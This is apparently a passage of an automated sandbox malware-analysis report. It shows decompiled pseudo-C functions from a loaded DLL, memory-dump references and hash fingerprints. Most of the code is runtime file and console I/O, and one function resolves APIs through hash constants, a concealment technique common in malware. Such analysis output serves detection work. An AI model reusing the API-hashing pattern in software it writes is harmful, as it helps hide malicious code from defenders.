                                				 *((char*)( *((intOrPtr*)(0x13124970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x39)) =  *((intOrPtr*)(_t282 - 0x61));
                                				_t272 =  *_t278;
                                				_t273 = _t272 << 6;
                                				_t251 =  *((intOrPtr*)(0x13124970 + (_t272 >> 6) * 8));
                                				 *(_t251 + _t273 + 0x3d) =  *(_t251 + _t273 + 0x3d) & 0x000000fe;
                                				 *(_t251 + _t273 + 0x3d) =  *(_t251 + _t273 + 0x3d) | r12d >> 0x00000010 & 0x00000001;
                                				if ((_t161 & 0x00000048) != 0) goto 0x130f2759;
                                				if ((r12b & 0x00000008) == 0) goto 0x130f2759;
                                				_t252 =  *_t278;
                                				_t221 =  *((intOrPtr*)(0x13124970 + (_t252 >> 6) * 8));
                                				 *(_t221 + (_t252 << 6) + 0x38) =  *(_t221 + (_t252 << 6) + 0x38) | 0x00000020;
                                				if ((r14d & 0xc0000000) != 0xc0000000) goto 0x130f280c;
                                				if ((r12b & 0x00000001) == 0) goto 0x130f280c;
                                				CloseHandle(_t281);
                                				 *(_t285 + 0x30) =  *(_t285 + 0x30) & 0x00000000;
                                				asm("inc ecx");
                                				r8d =  *(_t282 - 0x11);
                                				 *(_t285 + 0x28) = 0xc0000000;
                                				 *((intOrPtr*)(_t285 + 0x20)) =  *((intOrPtr*)(_t282 - 0x51));
                                				 *(_t282 - 0x55) = r14d;
                                				CreateFileW(??, ??, ??, ??, ??, ??, ??);
                                				if (_t221 != 0xffffffff) goto 0x130f27f2;
                                				E00007FFC7FFC130EE630(GetLastError(), _t221,  *(_t282 - 0x49) >> 0x20);
                                				 *( *((intOrPtr*)(0x13124970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x38) =  *( *((intOrPtr*)(0x13124970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x38) & 0x000000fe;
                                				E00007FFC7FFC130F3DB0(_t161,  *_t278, _t185, _t231, _t278, _t280);
                                				goto 0x130f24bb;
                                				 *((long long*)( *((intOrPtr*)(0x13124970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x28)) = _t221;
                                				return 0;
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                • String ID:
                                • API String ID: 1330151763-0
                                • Opcode ID: 544f02e6fad5c1fd8408f698f3878f30c1ec09c20e745f70c9dbf413a5d11e2f
                                • Instruction ID: 25588ca94b627607ef5f1f763dcafdefba288fa573b939a7fcf0709a7b59f7d7
                                • Opcode Fuzzy Hash: 544f02e6fad5c1fd8408f698f3878f30c1ec09c20e745f70c9dbf413a5d11e2f
                                • Instruction Fuzzy Hash: 31C1CD36B28E598AEB54CF64D9513AC37A5FB48BA8F014235CA2E677D5CF38E425C310
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 86%
                                			E00007FFC7FFC130F5864(void* __ebx, signed int __ecx, void* __edx, void* __ebp, signed int* __rax, long long __rbx, long long __rdx, long long __r8) {
                                				void* _t118;
                                				unsigned int _t135;
                                				void* _t139;
                                				void* _t142;
                                				char _t154;
                                				char _t155;
                                				char _t156;
                                				void* _t181;
                                				long long _t186;
                                				long long _t220;
                                				intOrPtr _t221;
                                				signed short* _t235;
                                				signed int* _t238;
                                				char* _t241;
                                				signed short* _t250;
                                				signed long long _t255;
                                				signed long long _t256;
                                				signed long long _t261;
                                				DWORD* _t263;
                                				signed short* _t264;
                                				void* _t270;
                                				void* _t272;
                                				signed long long _t274;
                                				void* _t276;
                                				void* _t277;
                                				long long _t279;
                                				signed short* _t281;
                                				signed short* _t288;
                                				long _t292;
                                				void* _t294;
                                				void* _t297;
                                				void* _t299;
                                				char* _t301;
                                				char* _t302;
                                				char* _t303;
                                
                                				_t279 = __r8;
                                				 *((long long*)(_t276 + 0x18)) = __rbx;
                                				 *((long long*)(_t276 + 0x10)) = __rdx;
                                				_t277 = _t276 - 0x60;
                                				r12d = r8d;
                                				if (r13d != 0xfffffffe) goto 0x130f58a5;
                                				E00007FFC7FFC130EE680(__rax);
                                				 *__rax = 0;
                                				E00007FFC7FFC130EE6A0(__rax);
                                				 *__rax = 9;
                                				goto 0x130f5cae;
                                				if (__ecx < 0) goto 0x130f5c97;
                                				_t181 = r13d -  *0x13124d70; // 0x40
                                				if (_t181 >= 0) goto 0x130f5c97;
                                				_t3 = _t270 + 1; // 0x1
                                				r8d = _t3;
                                				 *((long long*)(_t277 + 0x48)) = __r8;
                                				_t274 = __ecx << 6;
                                				_t255 = __ecx >> 6;
                                				 *(_t277 + 0x40) = _t255;
                                				_t220 =  *((intOrPtr*)(0x13124970 + _t255 * 8));
                                				if (( *(_t220 + _t274 + 0x38) & r8b) == 0) goto 0x130f5c97;
                                				if (r12d - 0x7fffffff <= 0) goto 0x130f5911;
                                				E00007FFC7FFC130EE680(_t220);
                                				 *_t220 = 0;
                                				E00007FFC7FFC130EE6A0(_t220);
                                				 *_t220 = 0x16;
                                				goto 0x130f5ca9;
                                				if (r12d == 0) goto 0x130f5c93;
                                				if (( *(_t220 + _t274 + 0x38) & 0x00000002) != 0) goto 0x130f5c93;
                                				_t186 = __rdx;
                                				if (_t186 == 0) goto 0x130f58fa;
                                				r10d =  *((char*)(_t220 + _t274 + 0x39));
                                				 *((long long*)(_t277 + 0x38)) =  *((intOrPtr*)(_t220 + _t274 + 0x28));
                                				 *((intOrPtr*)(_t277 + 0xa0)) = r10b;
                                				if (_t186 == 0) goto 0x130f596c;
                                				if (_t186 != 0) goto 0x130f5961;
                                				if ((r8b &  !r12d) == 0) goto 0x130f5976;
                                				r14d = r12d;
                                				goto 0x130f5a0c;
                                				if ((r8b &  !r12d) != 0) goto 0x130f5992;
                                				E00007FFC7FFC130EE680(_t220);
                                				 *_t220 = 0;
                                				_t118 = E00007FFC7FFC130EE6A0(_t220);
                                				 *_t220 = 0x16;
                                				E00007FFC7FFC130EE580(_t118);
                                				goto 0x130f5b18;
                                				r14d = r12d;
                                				r14d = r14d >> 1;
                                				r14d =  <  ? 4 : r14d;
                                				E00007FFC7FFC130EE154(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)));
                                				_t241 = _t220;
                                				E00007FFC7FFC130EE114(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)));
                                				E00007FFC7FFC130EE114(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)));
                                				_t301 = _t241;
                                				if (_t241 != 0) goto 0x130f59db;
                                				E00007FFC7FFC130EE6A0(_t220);
                                				 *_t220 = 0xc;
                                				E00007FFC7FFC130EE680(_t220);
                                				 *_t220 = 8;
                                				goto 0x130f5b18;
                                				_t26 = _t255 + 1; // 0x1
                                				r8d = _t26;
                                				E00007FFC7FFC130F5D68(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)), _t255);
                                				_t256 =  *(_t277 + 0x40);
                                				r10b =  *((intOrPtr*)(_t277 + 0xa0));
                                				r8d = 1;
                                				 *((long long*)( *((intOrPtr*)(0x13124970 + _t256 * 8)) + _t274 + 0x30)) = _t220;
                                				_t221 =  *((intOrPtr*)(0x13124970 + _t256 * 8));
                                				 *((long long*)(_t277 + 0x50)) = _t301;
                                				r9d = 0xa;
                                				if (( *(_t221 + _t274 + 0x38) & 0x00000048) == 0) goto 0x130f5aa1;
                                				_t154 =  *((intOrPtr*)(_t221 + _t274 + 0x3a));
                                				if (_t154 == r9b) goto 0x130f5aa1;
                                				if (r14d == 0) goto 0x130f5aa1;
                                				 *_t301 = _t154;
                                				r14d = r14d - 1;
                                				_t302 = _t301 + _t279;
                                				 *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t256 * 8)) + _t274 + 0x3a)) = r9b;
                                				if (r10b == 0) goto 0x130f5aa1;
                                				_t155 =  *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t256 * 8)) + _t274 + 0x3b));
                                				if (_t155 == r9b) goto 0x130f5aa1;
                                				if (r14d == 0) goto 0x130f5aa1;
                                				 *_t302 = _t155;
                                				_t303 = _t302 + _t279;
                                				r14d = r14d - 1;
                                				 *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t256 * 8)) + _t274 + 0x3b)) = r9b;
                                				if (r10b != r8b) goto 0x130f5aa1;
                                				_t156 =  *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t256 * 8)) + _t274 + 0x3c));
                                				if (_t156 == r9b) goto 0x130f5aa1;
                                				if (r14d == 0) goto 0x130f5aa1;
                                				 *_t303 = _t156;
                                				r14d = r14d - 1;
                                				 *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t256 * 8)) + _t274 + 0x3c)) = r9b;
                                				if (E00007FFC7FFC130F3EE4(r13d, 0,  *((intOrPtr*)(0x13124970 + _t256 * 8))) == 0) goto 0x130f5b36;
                                				_t228 =  *((intOrPtr*)(0x13124970 +  *(_t277 + 0x40) * 8));
                                				if (( *( *((intOrPtr*)(0x13124970 +  *(_t277 + 0x40) * 8)) + _t274 + 0x38) & 0x00000080) == 0) goto 0x130f5b36;
                                				if (GetConsoleMode(_t299) == 0) goto 0x130f5b36;
                                				if ( *((char*)(_t277 + 0xa0)) != 2) goto 0x130f5b3b;
                                				r14d = r14d >> 1;
                                				r8d = r14d;
                                				 *(_t277 + 0x20) = _t270;
                                				if (ReadConsoleW(_t297, _t294, _t292, _t263, _t270) != 0) goto 0x130f5b2a;
                                				E00007FFC7FFC130EE630(GetLastError(),  *((intOrPtr*)(0x13124970 +  *(_t277 + 0x40) * 8)), _t241);
                                				E00007FFC7FFC130EE114( *((intOrPtr*)(0x13124970 +  *(_t277 + 0x40) * 8)), _t241);
                                				goto 0x130f5cb1;
                                				goto 0x130f5b76;
                                				 *((intOrPtr*)(_t277 + 0x48)) = sil;
                                				r8d = r14d;
                                				 *(_t277 + 0x20) = _t270;
                                				if (ReadFile(_t272, ??, ??, ??) == 0) goto 0x130f5c5d;
                                				if ( *((intOrPtr*)(_t277 + 0xb8)) - r12d > 0) goto 0x130f5c5d;
                                				if (( *( *((intOrPtr*)(0x13124970 +  *(_t277 + 0x40) * 8)) + _t274 + 0x38) & 0x00000080) == 0) goto 0x130f5b1b;
                                				if ( *((char*)(_t277 + 0xa0)) == 2) goto 0x130f5bbf;
                                				_t261 = _t303 + _t279;
                                				 *(_t277 + 0x20) = _t292 >> 1;
                                				_t135 = E00007FFC7FFC130F5564(__ebx, r13d, _t263 + _t228 * 2 +  *((intOrPtr*)(_t277 + 0xb8)), _t261, _t263 + _t228 * 2 +  *((intOrPtr*)(_t277 + 0xb8)),  *((intOrPtr*)(_t277 + 0xa8)));
                                				goto 0x130f5b1b;
                                				if (_t135 == 0) goto 0x130f5c45;
                                				_t281 =  *((intOrPtr*)(_t277 + 0x50));
                                				_t250 = _t281;
                                				_t264 = _t281;
                                				_t288 =  &(_t281[_t135 >> 1]);
                                				if (_t281 - _t288 >= 0) goto 0x130f5c38;
                                				_t235 =  &(_t281[1]);
                                				r9d =  *_t250 & 0x0000ffff;
                                				if (r9w == 0x1a) goto 0x130f5c2f;
                                				if (r9w != 0xd) goto 0x130f5c18;
                                				if (_t235 - _t288 >= 0) goto 0x130f5c18;
                                				if ( *_t235 != 0xa) goto 0x130f5c18;
                                				 *_t264 = 0xa;
                                				goto 0x130f5c28;
                                				_t264[1] = r9w;
                                				if ( &(_t250[3]) - _t288 < 0) goto 0x130f5beb;
                                				goto 0x130f5c38;
                                				_t238 =  *((intOrPtr*)(0x13124970 + _t261 * 8));
                                				 *(_t238 + _t274 + 0x38) =  *(_t238 + _t274 + 0x38) | 0x00000002;
                                				goto 0x130f5b1b;
                                				E00007FFC7FFC130F5334(r13d, _t135 + _t135,  *((intOrPtr*)(_t277 + 0x50)), _t135 + _t135 >> 1);
                                				goto 0x130f5bb8;
                                				if (GetLastError() != 5) goto 0x130f5c83;
                                				E00007FFC7FFC130EE6A0(_t238);
                                				 *_t238 = 9;
                                				_t139 = E00007FFC7FFC130EE680(_t238);
                                				 *_t238 = 5;
                                				goto 0x130f5b18;
                                				if (_t139 != 0x6d) goto 0x130f5b11;
                                				goto 0x130f5b1b;
                                				goto 0x130f5cb1;
                                				E00007FFC7FFC130EE680(_t238);
                                				 *_t238 = 0xa;
                                				_t142 = E00007FFC7FFC130EE6A0(_t238);
                                				 *_t238 = 9;
                                				return E00007FFC7FFC130EE580(_t142) | 0xffffffff;
                                			}







































                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 3215553584-0
                                • Opcode ID: 9572a25240cbba2ebec1dfc6c115ffcd4b7ea8cb82a20bbf97e2d75b67ba7c1d
                                • Instruction ID: d87aa89be38254d429dec8f1926e9f76cc9980d3ac39fc49bde44a9cb0598bb5
                                • Opcode Fuzzy Hash: 9572a25240cbba2ebec1dfc6c115ffcd4b7ea8cb82a20bbf97e2d75b67ba7c1d
                                • Instruction Fuzzy Hash: 23C1F422A1CEAEC7EA648F10994027D6BD9BB80BE8F550174DA4E233D5CF3DD865C360
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 17%
                                			E00000201201640C1BFC(long long* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, intOrPtr _a8, long long _a16, long long _a24, long long _a40, long long _a48) {
                                				long long _v72;
                                				char _v80;
                                				char _v88;
                                				long long _v96;
                                				char _v104;
                                				signed int _v112;
                                				long long _v120;
                                				long long _v128;
                                				intOrPtr _v136;
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				signed int _t65;
                                				intOrPtr _t93;
                                				intOrPtr _t94;
                                				long long* _t148;
                                				long long* _t152;
                                				long long* _t155;
                                				long long* _t157;
                                				intOrPtr* _t188;
                                				intOrPtr _t189;
                                				long long _t192;
                                				long long* _t193;
                                				void* _t203;
                                				intOrPtr _t213;
                                				long long _t214;
                                
                                				_t157 = __rbx;
                                				_t148 = __rax;
                                				_a24 = __rbx;
                                				_a16 = __rdx;
                                				_t214 =  *0x640cd458;
                                				_t192 =  *((intOrPtr*)(__rcx));
                                				r13d = r8d;
                                				_t193 = __rcx;
                                				_v72 = _t214;
                                				_v96 = _t192;
                                				if ( *((intOrPtr*)(__rcx + 0x70)) -  *((intOrPtr*)(__rcx + 0x50)) < 0) goto 0x640c1c4a;
                                				E00000201201640C47B8(0, __rax, __rbx, __rcx, __rdx);
                                				E00000201201640C908C(0x4a75e5e7, __rax,  *((intOrPtr*)(_t214 + 0x10)));
                                				if (_t148 == _t157) goto 0x640c1c63;
                                				_t9 = _t192 + 0x18; // 0x18
                                				 *_t148();
                                				_t65 =  *(_t193 + 0x50) & 0x000000ff;
                                				if (( *(_t193 + 0x70) & 0x000000ff) - _t65 >= 0) goto 0x640c1cdd;
                                				_t188 =  *((intOrPtr*)( *((intOrPtr*)(_t193 + 0x48)) + _t9 * 8));
                                				_t93 =  *_t188;
                                				if (_t93 == 0) goto 0x640c1c94;
                                				if (_t93 == 0x2f) goto 0x640c1c90;
                                				_t94 =  *((intOrPtr*)(_t188 + 1));
                                				if (_t94 != 0) goto 0x640c1c82;
                                				if (_t94 != 0) goto 0x640c1c97;
                                				_t152 = _t157;
                                				if (_t152 == _t157) goto 0x640c1caf;
                                				if ( *((char*)(_t152 - 1)) != 0x3a) goto 0x640c1caf;
                                				if ( *((char*)(_t152 + 1)) != 0x2f) goto 0x640c1caf;
                                				E00000201201640C240C(0, _t157, _t9 + _t188, _t192, _t193);
                                				if (_t152 == _t157) goto 0x640c1cdd;
                                				bpl = _t65 - 0x4a75e5e7 + 2 == 8;
                                				_a8 = 0;
                                				goto 0x640c1ceb;
                                				E00000201201640C908C(0x8d72aad2, _t152,  *((intOrPtr*)(_t214 + 0x10)));
                                				if (_t152 == _t157) goto 0x640c1d09;
                                				 *_t152();
                                				if (_t152 == _t157) goto 0x640c1ed1;
                                				_t23 =  &_v104; // 0x2
                                				r9d = 0;
                                				r8d = r13d;
                                				_v112 = _t23;
                                				_t25 =  &_v88; // 0x12
                                				_t189 = _a16;
                                				_v120 = _t25;
                                				_t27 =  &_v80; // 0x1a
                                				_t155 = _t27;
                                				_v128 = _t155;
                                				_v136 = 0;
                                				if (E00000201201640C5168(_t157, _t193, _t189, _t203) != 0) goto 0x640c1ec1;
                                				_t213 =  *0x640cd458;
                                				E00000201201640C908C(0x4a75e5e7, _t155,  *((intOrPtr*)(_t213 + 0x10)));
                                				if (_t155 == _t157) goto 0x640c1d77;
                                				 *_t155();
                                				if ( *((intOrPtr*)(_t193 + 0x18)) == _t157) goto 0x640c1d8c;
                                				E00000201201640C240C(0, _t157,  *((intOrPtr*)(_t193 + 0x18)), _t192, _t193);
                                				goto 0x640c1d94;
                                				E00000201201640C908C(0x8d72aad2, _t155,  *((intOrPtr*)(_t213 + 0x10)));
                                				if (_t155 == _t157) goto 0x640c1dad;
                                				 *_t155();
                                				if (_a8 == _t157) goto 0x640c1ea1;
                                				E00000201201640C908C(0xfb849f8f, _t155,  *((intOrPtr*)(_t214 + 0x18)));
                                				if (_t155 == _t157) goto 0x640c1dd5;
                                				r14d =  *_t155();
                                				goto 0x640c1dd8;
                                				r14d = 0;
                                				E00000201201640C908C(0xfb849f8f, _t155,  *((intOrPtr*)(_v72 + 0x18)));
                                				if (_t155 == _t157) goto 0x640c1df7;
                                				r13d =  *_t155();
                                				goto 0x640c1dfa;
                                				r13d = 0;
                                				_t40 = _t214 + 2; // 0x2
                                				E00000201201640C240C(_t213 + _t40, _t157, _t152, _t192, _a8);
                                				if (_t155 == _t157) goto 0x640c1e93;
                                				_t41 = _t213 + 1; // 0x1
                                				r8d = _t41;
                                				 *((char*)(_t189 + _t155)) = 0x2f;
                                				0x640c47b0();
                                				_v112 = 0 | _a8 != 0x00000000 | 0x00000002;
                                				_v120 = _a48;
                                				_v128 = _a40;
                                				_v136 = _v104;
                                				if (E00000201201640C6518(_a40, _v96, _t155, _t192, _a8, _t155, _v80, _v88) != 0x10d2) goto 0x640c1e85;
                                				asm("sbb eax, eax");
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				goto 0x640c1ed6;
                                				return 8;
                                			}






























                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: FreeHeap$ErrorLast
                                • String ID: uJ$uJ
                                • API String ID: 2332451156-3171342107
                                • Opcode ID: 7d8230a046c4e347e58ee4c4be8fc8a96b4e0ab99a4e879f048771c8d09b0c9e
                                • Instruction ID: 472db6e0f7e024575461c38261d4bf7162b67d150d80215de507f62be774332f
                                • Opcode Fuzzy Hash: 7d8230a046c4e347e58ee4c4be8fc8a96b4e0ab99a4e879f048771c8d09b0c9e
                                • Instruction Fuzzy Hash: ED81C5227047A0C7DB20DB66E8592EE7BAAF7C9B84F584421FF4E4774ACE39C4558704
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$mscoree.dll
                                • API String ID: 4061214504-1276376045
                                • Opcode ID: c2f227e28329df5dc8db2b91678dcb263e506423369a0cae19a5505f40a1c87e
                                • Instruction ID: af41ad1a353df793f28d0ed632af6f6e6ff1c393578a34c4022ff524bf2c32b2
                                • Opcode Fuzzy Hash: c2f227e28329df5dc8db2b91678dcb263e506423369a0cae19a5505f40a1c87e
                                • Instruction Fuzzy Hash: 0AF0C862B19F5696FF449B15F48027963A0EF8C7A8F541435D90F22664DF3CD494D320
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 46%
                                			E00007FFC7FFC130F4AF8(signed long long __ecx, void* __edx, void* __esi, void* __ebp, intOrPtr* __rax, long long __rbx, signed short* __rdx, void* __r9, long long _a32) {
                                				char _v64;
                                				signed long long _v72;
                                				intOrPtr _v84;
                                				unsigned int _v88;
                                				intOrPtr _v96;
                                				long long _v100;
                                				signed int _v104;
                                				signed int _v120;
                                				void* __rbp;
                                				void* _t75;
                                				long _t94;
                                				unsigned int _t95;
                                				intOrPtr _t103;
                                				signed int _t124;
                                				intOrPtr _t158;
                                				unsigned long long _t164;
                                				signed int* _t166;
                                				intOrPtr _t169;
                                				unsigned int _t182;
                                				signed short* _t183;
                                				void* _t185;
                                				signed long long _t194;
                                				void* _t195;
                                				signed long long _t197;
                                				signed long long _t198;
                                				signed long long _t200;
                                				void* _t201;
                                				signed short* _t202;
                                
                                				_t192 = __r9;
                                				_t179 = __rdx;
                                				_t167 = __rbx;
                                				_a32 = __rbx;
                                				r15d = r8d;
                                				_t194 = __ecx;
                                				_t183 = __rdx;
                                				if (r8d != 0) goto 0x130f4b26;
                                				goto 0x130f4dc1;
                                				if (__rdx != 0) goto 0x130f4b4a;
                                				E00007FFC7FFC130EE680(__rax);
                                				 *__rax = 0;
                                				_t75 = E00007FFC7FFC130EE6A0(__rax);
                                				 *__rax = 0x16;
                                				E00007FFC7FFC130EE580(_t75);
                                				goto 0x130f4dc1;
                                				r14d = r14d & 0x0000003f;
                                				_t197 = _t194 >> 6;
                                				_t200 = _t194 << 6;
                                				_v72 = _t197;
                                				_t169 =  *((intOrPtr*)(0x13124970 + _t197 * 8));
                                				_t103 =  *((intOrPtr*)(_t169 + _t200 + 0x39));
                                				if (__rbx - 1 - 1 > 0) goto 0x130f4b80;
                                				if (( !r15d & 0x00000001) == 0) goto 0x130f4b2b;
                                				if (( *(_t169 + _t200 + 0x38) & 0x00000020) == 0) goto 0x130f4b96;
                                				_t14 = _t179 + 2; // 0x2
                                				r8d = _t14;
                                				E00007FFC7FFC130F5D68(0x13124970, _t169, __rdx);
                                				_v88 = _t182;
                                				if (E00007FFC7FFC130F3EE4(r12d, 0, 0x13124970) == 0) goto 0x130f4cab;
                                				_t158 =  *((intOrPtr*)(0x13124970 + _t197 * 8));
                                				if (( *(0x13124970 + _t200 + 0x38) & 0x00000080) == 0) goto 0x130f4cab;
                                				E00007FFC7FFC130EF0D4(_t158, __rbx, _t169, _t179, __r9);
                                				if ( *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x90)) + 0x138)) != _t182) goto 0x130f4bec;
                                				if ( *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t197 * 8)) + _t200 + 0x39)) == dil) goto 0x130f4cab;
                                				if (GetConsoleMode(??, ??) == 0) goto 0x130f4cab;
                                				if (_t103 == 0) goto 0x130f4c8d;
                                				if (_t103 - 1 - 1 > 0) goto 0x130f4d48;
                                				_v104 = _v104 & 0;
                                				_t195 = _t183 + _t201;
                                				_t202 = _t183;
                                				_v100 = 0;
                                				if (_t183 - _t195 >= 0) goto 0x130f4d3e;
                                				r13d =  *_t202 & 0x0000ffff;
                                				if (E00007FFC7FFC130F633C(r13w & 0xffffffff) != r13w) goto 0x130f4c7b;
                                				_v100 = 2;
                                				if (r13w != 0xa) goto 0x130f4c70;
                                				r13d = 0xd;
                                				if (E00007FFC7FFC130F633C(r13d) != r13w) goto 0x130f4c7b;
                                				_v100 = 2;
                                				if ( &(_t202[1]) - _t195 >= 0) goto 0x130f4c84;
                                				goto 0x130f4c35;
                                				_v104 = GetLastError();
                                				_t198 = _v72;
                                				goto 0x130f4d3e;
                                				r9d = r15d;
                                				E00007FFC7FFC130F446C(r12d, 1, __esi, _t167,  &_v104,  &_v64, _t183, _t192);
                                				asm("movsd xmm0, [eax]");
                                				_t124 =  *0x7FFC13124978;
                                				goto 0x130f4d43;
                                				if (( *( *((intOrPtr*)(0x13124970 + _t198 * 8)) + _t200 + 0x38) & 0x00000080) == 0) goto 0x130f4d0b;
                                				if (3 == 0) goto 0x130f4cf7;
                                				if (3 == 0) goto 0x130f4ce3;
                                				if (2 != 1) goto 0x130f4d48;
                                				r9d = r15d;
                                				E00007FFC7FFC130F477C(3, r12d, 0x13124970, _t167,  &_v104, _t185, _t183);
                                				goto 0x130f4c9f;
                                				r9d = r15d;
                                				E00007FFC7FFC130F4898(r12d, _t124, 0x13124970, _t167,  &_v104, _t185, _t183);
                                				goto 0x130f4c9f;
                                				r9d = r15d;
                                				E00007FFC7FFC130F4674(r12d, _t124, 0x13124970, _t167,  &_v104, _t185, _t183);
                                				goto 0x130f4c9f;
                                				_v104 = _v104 & _t124;
                                				_v120 = _v120 & 0x13124970;
                                				r8d = r15d;
                                				_v100 = 0x13124970;
                                				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x130f4d3b;
                                				_t94 = GetLastError();
                                				_v104 = _t94;
                                				asm("movsd xmm0, [ebp-0x30]");
                                				asm("movsd [ebp-0x20], xmm0");
                                				_t164 = _v88 >> 0x20;
                                				if (_t94 != 0) goto 0x130f4dbc;
                                				_t95 = _v88;
                                				if (_t95 == 0) goto 0x130f4d88;
                                				if (_t95 != 5) goto 0x130f4d7b;
                                				E00007FFC7FFC130EE6A0(_t164);
                                				 *_t164 = 9;
                                				E00007FFC7FFC130EE680(_t164);
                                				 *_t164 = 5;
                                				goto 0x130f4b42;
                                				E00007FFC7FFC130EE630(_v88, _t164, _t167);
                                				goto 0x130f4b42;
                                				_t166 =  *((intOrPtr*)(0x13124970 + _t198 * 8));
                                				if (( *(0x13124970 + _t200 + 0x38) & 0x00000040) == 0) goto 0x130f4da4;
                                				if ( *_t183 == 0x1a) goto 0x130f4b1f;
                                				E00007FFC7FFC130EE6A0(_t166);
                                				 *0x13124970 = 0x1c;
                                				E00007FFC7FFC130EE680(_t166);
                                				 *_t166 =  *_t166 & 0x00000000;
                                				goto 0x130f4b42;
                                				return _v84 - _v96;
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 3215553584-0
                                • Opcode ID: 1c690db1309c7a900eb2931eff8c1d9e19a22f9b812b3326b35846991b02b16e
                                • Instruction ID: 8198741ddaf4f9c2ed38ab7a1c700d2cf715dc8ed07617c4b25deb922127e75a
